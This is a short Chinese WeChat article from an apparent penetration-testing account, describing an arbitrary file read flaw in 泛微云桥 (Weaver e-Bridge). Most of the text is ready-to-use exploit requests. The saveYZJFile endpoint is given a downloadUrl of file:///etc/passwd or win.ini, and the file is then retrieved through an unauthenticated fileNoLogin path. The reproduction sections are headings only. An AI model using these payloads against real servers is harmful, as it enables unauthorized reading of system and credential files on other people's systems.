> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/VoYPK9xozaxvxKq2J\_Gxkg)
点击蓝字 · 关注我们
01
漏洞标题
泛微云桥任意文件读取
02
生成文件 id
0x01 payload
Linux:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
Windows:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
03
获取文件内容
Payload:/file/fileNoLogin/{id 值}
04
Linux 复现
05
Windows 复现
关注 EDI 安全,获取更多 HVV 情报
EDI 安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号